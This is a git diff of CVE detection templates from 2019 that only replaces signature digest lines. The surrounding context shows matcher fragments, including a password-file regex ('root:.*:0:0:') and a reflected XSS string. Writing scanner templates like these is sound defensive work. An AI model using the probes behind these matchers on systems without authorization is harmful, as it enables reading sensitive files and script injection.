+# digest: 4a0a00473045022100e7c35881cea5db8dce5212d31e7885fed81dbe51419f5e5f94b108108469023d02204d832a40fb5f0d3ba47c93f34f34cd5bad2a77a9ff70aad0275a112f6406daa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 2b18cc2428..df1242834e 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -49,5 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Custom 404 Pro")' condition: and - -# digest: 490a0046304402206013afe5f7a808774f40824f64d3497f71e34f3da3b4695944d0dbae585a6e1d02206743f52b599793f7a10b359832f3f122c5865c5228696906523567e1d5b7ca43:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220223bc404b4bbfa9539297003f0e11e438dcf673791ae09cfe3a0dd8df1bc19030220423b051bac9fe7e951e0b04dad292e0d1c92a954724c9db715a06187ef99cbbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 57ac393908..1ab8204b8e 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fbd33a85cb784a5cc095b80a2bee6f8dc720bdb753f791fb50bd870c765a807e022008878f90d2f01e13f4ea211aa5aac77b638bad195ccd4a39882a55cd9ebfd7ae:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220544543089783437dbe2a690e5718f2bee0a6650aecad933f142fc2366f70fa4a0220153eae6c120afa9af11070c3c3791831bd31cd50e6cbad5fd09e953efd919c2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 0dc4a6ddab..7e2837150e 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220775eb30b6b056ce1f20ba417e9395fcf849a6dc2cf5c21207fba80e712d3a449022100883804b483d3d24b047df05ffa195227b122454de68f76dba0cc8117adb385db:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008b926f176d27b432afc930651ca8f4efb3d5cbfb60667deca51abbf0494c3b28022100f3f6bf213951452aa78410ad69e52f8a5a7ccaa96caa9cba40f848f5be94121b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index e9fbfa00a1..d4e52230a1 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -44,5 +44,4 @@ http: - type: regex regex: - "root:.*:0:0:" - -# digest: 4b0a00483046022100ac3abc0e29431298dcbea445990002f316485be6f192472fec786c03482ee816022100daec667ee62fa8ccf3cbdbb1826ef910f04688d7e1d5e62da4b19458bd744513:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022026556a12cb4101f1b86247c3c5f4ac1d535ade9138485d16328d5da3975a5499022100e3bbf215ee90b5e0a867656d29b3bccb553e9f7fb5b07ac364b590c06d0df541:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index c1c877d785..2a81ced0b4 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cbf9b3ed1745b7e3ff23283d1f8c112029179de0d565e769cba7e307b066034a022100c8f9081dce4ab4d8a879fd3ca5658b67e5966735cb354fb8d424eca1e1844b9a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100881f6c017eea850c2a3a30eb0645ad499dceefa750e2d510f04604c423fc961a02207bbf4414a9d98340f3c2f4a7fe49c851a59c674dd2f1be27955229fff98c648e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index abaacf6217..e5db849bf8 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -80,5 +80,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fb1a1c1c9b504e81774531ce6e4ce5fc27128663565ca25a304449392c43e0ad022100896cdac3892ffe65cdef9a70584c2f6d7d77f202b13572e93b5747c5b027e39d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022019b21599f0cdecbb96900043224c170132c6cb1b4a798bbbce8a07a70487b9ed022100bd7971bf5b8d65aebf4db2823dc01493a05803a626c5a782e85525f58f06375d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 63d9fecf3a..36b017e8e9 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f55b3a7821830134448f10192a27764ab714f90727753d790287c92774699f7b02204af1215ecfbff7bb212410ed2686d48d5a5147bbd8fdde845afa91e8c6115c39:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c40c041ead25b9aba5992db8f305fa9c1dd5e1bb9616a56c46fe8c17881c79d502206d96466ef5fe1b1129d90d7a352324d688932e1971e88d7b0c5120f844dca8c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index 0114aa5fe3..a14d9d070a 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' - 'contains(body_2, "DomainMOD")' condition: and - -# digest: 490a0046304402200f69c788b1cf77d5a99caaedd66a777b06565e8a59d628cdaed8e707f70817fc02201a48fa4f25efef2a9264ad037322946d41bdd44e5f55b4c467907ac5a4b59eba:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220028b993546a3ee65e289d7e9ccb7009d9ebbbdedfe58b092c28ad75ac1c89a2f022035c1e56dd9409751b56c04104089d40fe16f381dbc0edb7c7947f2df08ce2004:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 1e85ad8561..21b928d0df 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -50,5 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "post galleries!")' condition: and - -# digest: 4a0a00473045022003b781eaae044527c75bf8c327c3e09e15102d2d729abb10ab54b26b5606ecd7022100d39a489f9135081a0886f1dd4204726d83b974ceb6f934a3b47046525e464fb2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206e23a441aec5309c70433a8cb226e7fa00d7b1f62202628dcf226780a740b9510220216aa8d6bdce9d92abe4cf16b3692d3b6dcc2d2f9e0767f81a0c5019a1b12b9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index 57da370495..d6490a8886 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201a5439462885ffdefeeca1100881c01d5d273030ae86453cd8c30b47591e228c022100a90d7c6179d99cd1bdfd403935f9c26d9e28a607ce4d11f008bdc57568750f82:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a7a4b18a4fe03fa789eb88a70eb1b000353b7c3330cd493fc136e11424b644b9022100e81ab662011136ed503ea4d116af7b9c29aa518faad8b3e6921130a992de9766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 9e4b929ec8..42d98bdce0 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d0d3e7a8f38d5ef05cbf607f8bf8b7f97b32d87fbf19fec7802360d72029509c0220282e5abd9b20322d1a192fa7f5938792a3b3b0f1ec9b3ea73df19b9e721414e9:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022033cd332ca17b4a0e2271781e93565d477e834d4f94f8da41f0e2d2d5a9a56fac02206169afe4d3a455a40ff17dfea0d8221ced8c4f2f80c8c1a291fa9598c9f24460:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index 96544937fb..7c1ee8ecbf 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220290ab481fa5cf45137a45e8a14714274690cec8909e3ee9e0c7bbf3424a3051c022100fa38b820e154d4b7d1b73a80ea7f58c7b06b43cad66ee425c7e99ea97d724b4b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210085a95beb3017600c035c0dbc6509d10ee562bee3d7ecf36f0fceb74298f40153022100f99383845e40536698e94f3f029779448fa2aa8ffb5c760a211c14bf6952a123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 1c5d7a19ff..cb4528c2d3 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -51,5 +51,4 @@ http: - 201 - 409 condition: or - -# digest: 4b0a00483046022100dcb4d0639300e7a4e3f138636c61e9b1c0feeb2e6ed09cedbc7e69d793e64abe0221009c60693754b06841bd61befd6e688bf57b6af178e4bd7ed46e7b40f1ba1b1d3e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d413a6512833277f2ab5671294ef7b92f9621203d363b2fb069370602e43ff6d022100fc01a3b64885a4dec92a7f572914de37eabb78cbd577f8e7c16b7204fcb46271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 4c8165ddfd..4ba6bc082c 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022076b36ebbb254ca11bc9e143af3d0b74664b3dcd376622eac9848029561e81821022100d71dd4ace2b6023c2f8e9625e3cbdadd429b249370b6f2c144d1e31a2b686f58:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202820fd2f4dcf07ea014ae13cfdcd12cd7e28868776ce3efb4889fff3bf5dd610022100c051265b0d04b81a0de96475d97ae68338caa746bbd16946f837a851f0e6c334:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 928061a649..8e463eaef2 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -41,5 +41,4 @@ http: - type: regex regex: - "root:.*:0:0:" - -# digest: 4b0a00483046022100ecfc713c3268a04cb8648435ed8c50e171056ea0d33fc7836d8b4b2a38fd2f48022100bd3a266c1cf031ca262a38ca42700b7aca06bbbc824a5829d95b825d3c3a3d75:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022044313df469dc54cdc20e53a5c5dc4b1f3f58c82d411e27b595c898ceb189cadc0220586188926a9ea3c2b4965c564fb137c03849f2cb64839cffff0bdc803617f393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index d59b039ad9..22238798ed 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -47,5 +47,4 @@ http: regex: - '\*\*\*\*\*\*<\/td>' part: body - -# digest: 4a0a00473045022100d9da9b4b76786150283940246863c194b57687ec8779bb919664c30ee26c614302207d0a763359541fde99304e18025683b6bc5c28c18f80b877dc36f77f9b7d26aa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c3be890a86b7e68a7c10cb988c6a2709fc979fbee4c36f5181d225e8411cd4d50221009c88cd2266e290214ea07e2dc0d7a9fde80d8f172289bc7b422a5f3b7a63b6c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 68293aaf68..a50b373db0 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210087a99ec7f2a66a99c98c0c6b69498d54cb9e1161e2646e4bddb0b8177e879bca02201ef3b1c79b0b9791fbe2e9061a674c8338243604675770314e9909621437b8e4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201c050cddf2fc4d9f3bbd6b603d4334b92b796ead68f85341d23cf57b1b6f47c50220417df9fdce588eb05dcfa1333999690f2c2bb752996e69c76f1daa9f2147df1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 72a977dda2..ab494973af 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205f7a448dd381249aaa7d1af472d12ab2393ee8e723c56d55609e82ecfb126503022100bcf3ed8bb4eb9ebf3bc9d0aebe38adb551c9e2a7d78b01b159bcd2d370e3ed85:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202db25bc1c278b045647458c332640f177b02b7bee6aa4a91612220027d2f255502205c592b18555f69e1783c52527a41bd21f4e6f356c9f74d06f97ab4892128fe2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index ebb748f43d..48cae90ed1 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ab34dc387c016733415454291008cf7bb1612133abb97f5d70d952624e4caffa022100df8d2c146aeca023a599c1a1cd95d28ee641665f6384d476f23e6ea22bf9964c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022018d8a914f1e0f3b944b5249e96f671093435b3b9d13f1f9132f9215f664b83dd02204fd1938aafabe38797038e03bfd9c3b45ab7d138d63487985053d7759a045c4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 27c89c7501..f9f963d192 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d581d65f1ead3ab9cd1df6a9cf3d02eda545681ccc9847b01ecd0aec1e182e7502200e8ae1100aa2f4568ba5e9104b0ed3323518b1e8a7df3cb3e19015e68ff8f251:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a8a9b169cdfc29a4e4617d97c147da0427aef326929df770c0e194986147ec6a022100bf211c99796e9e25e23824ddfdeb1858128e434172894113a79281d1c7047ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index c2924d670f..7b616f6fa0 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bc11bd27a1c0f6453a73d52e8c520f5480f0af1cfd9945b8df3fe24c8a09a827022100822c81a60b250dae89623f6c571444f3e2c67bedea38d418e0e99a34240205a3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022034ebf35227e20187cb3064de535644d9e4f4727b8162e279874f8e8e5efe0e20022027195530a26cd9323eab8f4d8859375b05c896fa8a7111e1645d6674508ceeaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index ae79a55631..b08843348e 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022076afcb93410a8d58b87ba8df056361188486189e327f79770507750f4a5983d702210099201dd2f788373f3f64cd0096af32ff37b780173be97bbed6b055912fb03278:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009c6f455af6ddfe499fd2f7fc6c707cd69ae6ab228f9af892836d8cf599ae35e402201a94c8284d25034718b72d3d9a28b96fb924c2eac0e1f5d54688b992cb559215:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 437f42f6f5..8ede8b5354 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201602c225fe7d7ab1623e5e8488207a131b9c7851cef640ef538154687ec1be200221009ff2fb2e772ad3655f1331c79dd6df2feb347816e30425bff5265d4babf48f1b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100938a2f546a15f99fe0773f5b61afd439ad4eb652c844dbd06facfd594e9e0cd302207af2ac8d63a6041a0770b9af21221c31f29338fddb5ffd3347779e97cdde05e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index 16ee79ef4e..17808d471a 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e3bf7843335547095e383a3ec2f19679564a76ad04e6d4e54a933ea22e33b92e022034e46de1877ed7b1bd1448c87c8eb46d04c07247dde7d2aa9671038f877f2a3e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e6be281fc28bf3f58b2ce9fb6e97a3332d214a12ac912024959dcdf58778475e0220418d2f6fcf22494ea869521b16c42807b5f315d95596e8e077618122a9e9134f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 515376b527..f0b78cb94b 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f886838f7ba521a867a2dd1092dcb9590eb4a1bea2312ad73d230c8453f22533022017b0e1f36e8a1c2a95a1fc0a01914863a90689e5042653a00cd0c0eff7fbca87:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207b7e9c6a0dd510e5bfbce0886cf7215171e336b55db0174a2aaf96d6c0ae22db02204796e7f8090c3ab994e460ac61dc52e4da956dc0cfd0ea3d9c8859c3e93219fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml index 5cc27c7045..a5dc620a16 100644 --- a/http/cves/2019/CVE-2019-17503.yaml +++ b/http/cves/2019/CVE-2019-17503.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100987e07bcb6a58193675bfddeadd6b2872f6c85e018b42e19af78981d49bee3fe022100c317c85051601a037557240c637375ec32b3f55cf731e92847f18a4445352486:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022054dfc98da09f94c96d852d3b3e3df371e740cc449696dd15aa6b1be578e45d6a022100e3394473ba0bee6a5efe1132724e611fcaf256a8c6cf3864184b2016b040c209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index de84983a16..cb405956b1 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a14c5c9f9c3fb911c257d0f4146d3ac63efa0f5d4960db00d927423bdaf5a1900220528b55e364ddd0c133209016c826e48f47540e07e19c25592b357a60165cf21b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206bc398a1d5119babf70157007645354dc63fb89182cc1da233a3b410f0b7a8d202210095655060b5d47fe0a4703ab30449a759d6396af005b2df0386516cee804ccd51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index cee687cbe9..3aab833634 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100db715d24c2d349085c2070f15795cf3fe9a0865506cbdf6fa023aaa5ec78a89e022100f412cfab12ec8e6f3ec3ea7a87d59874106ec5358ab782d43a6d69dd729e212e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fd361a7ae7fd680de7289413293598df561e1fe2ab2ed4e230f22f89ff161e90022027a14f2d8899a4c0117d6e5863db7451fbd445827d0e7fd00d7a2e939b24d47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index b53badc936..85b76f5e7f 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -56,5 +56,4 @@ http: part: body_2 words: - 'CVE-2019-17574' - -# digest: 4a0a004730450221008416c0e73387f0ba5ecd96ace8e9dadde4d510ec449e3b47e174c8ab678aad1102207c427ba39990fa6415960236988c04b96e11cb024c6b7d7d25684189bddcd042:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210080d86c8e0e9e6a2bf7916b015303ff897d568f38af00c0b7e37dd5d3213ee7ba022033db0fb910c5745eea6ec93941ce75bc87e94b3615c0451d37d8db155dc68a6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 267d8b4a44..9e7447d180 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205fa50a641f68555b41f8ee829cac880c10ac5c431865c7b9754277c9591491b202201f22b5b32ab300c06a3722a9fcea144042867e2ef5942c560817b5be28cc0f6a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c15a4a8977a4cd68b772cd50d078a09a0980441b44cda94c5b04ba96ad77229202203eb9bac9ba07443837457b64cfc9be98a16fd344c30dbc31bb1ea3275ae5b1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 927761b4fa..859589b436 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -58,5 +58,4 @@ http: - "status_code == 200" - "contains((body_2), '{{randstr}}')" condition: and - -# digest: 4b0a00483046022100f13c4e11cba31ff699200c70c7f2fc2efde420e2899d59391b1686871d2d098d022100babc534489302aa58767c590d41a5232cb350a08872b686e0e810f740d8ebd58:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210087cbcfae5f8fd7943a27bb6ceaf46cbc8687dbf84f2f3b8d47314e93fff21ab802205cfbb75566e046922fa50835914f5b158b3188ee91f3734c90505197e98d786f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index eb8d76eaac..693358fd57 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fe3590e348642e02a0a64d23aa9f46bdc61d295fcff3edf7192873d282a8808002202d65cb731a92720e097a3cf6d2f34566861be084e74693192bd41a323eb9c3ff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204cd3b0aa10cc5b19d5d1e9dff509fb4c6303d6736d1e5a6b6eae30ef21595dee022100db89e9cd3a037110911ba57b6e3b86555f6ed4cc515ebbe7835cc1d1a949c018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index 94d54afa89..ed22f7ab22 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203ed9b3f000e4dc06309b3d9cc42e8f07fad6b3d89d2a0529c5ca9a1c166bc514022036cec07513b3e12224dc586ca58b2590d2ade8a860c6bafc99cc8e1704617e7d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009a42d352caf0e21d874a0367cf6a2e3458abb155be327bbbd5b270f5bc514fa7022100b4438c9c5b8a8a119eadf0ab600dc55de4e768d3ea1d65a5ae0a26fc416d74ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index 9e3f33c423..f44de065be 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -36,5 +36,4 @@ http: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and - -# digest: 490a0046304402203d11e69fececb7c7d0eec683ee7f531ac4f8cc5a65a067292b85bb881d7cc97f02200e3bd5adbf8bcf970f92720741aad96d39c06da1b3c7035832bb10b925bfd39c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200237dd9c724490a92aeaffe6c43f5e1351737633a80cb1da3c426266ec9cd1380220761a489b75c0b715811677cdae9c22a90a53d27887122879fee1945a798b499d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index 4bfd2cd479..55a79eb9dd 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210092dbbd8c0064fe6e62954ee3a5667c951cc0951007835f4b75ecba16fe1e193102202321419efeabf443788849c4961e82d99627816b3c01836ebe48b25ad090168a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ed5022a0583d205423c965aae69e4c7434ac2dc9f93973971a686426e24fd95d02210080eb2b04643191ca77ad19abf9987084de33c95d1bcdf17704c77b7f1c46ca3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 512040621a..a8930a7f71 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -61,5 +61,4 @@ http: json: - .user.username - .user.email - -# digest: 4a0a00473045022100e49ac039ddf2fea98766b3ef516f0b300bafe4adbd69526786595f02ca89900b0220205a015a934f67e0a3bf85807d055d012b0cf8633d664728feac203774153b59:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e046e54000989bbdd15d8471e59c93e00927923e5ac3d21230c413de0136db61022100fe2b46d92ac867aa675220cc24041753cda30342c550a21b66eb525e47693415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index f0d297e957..a0036aa702 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ab22685d7a7ee8125edf301bceb9b5fd6feae04edd18771cbbddb40caf967be002204bf257f2fa01bf54c59715a5990ea5f211a7840a460edc3413d93feadee6b11c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ae938f294b5e101c73e960ad404ce5038108bd765c5e8f0843dc5b1a6500cf57022035ca3eaabe1bc7332c5316881a0d8b0ac72947fd424aa337162a4ed6a6327091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 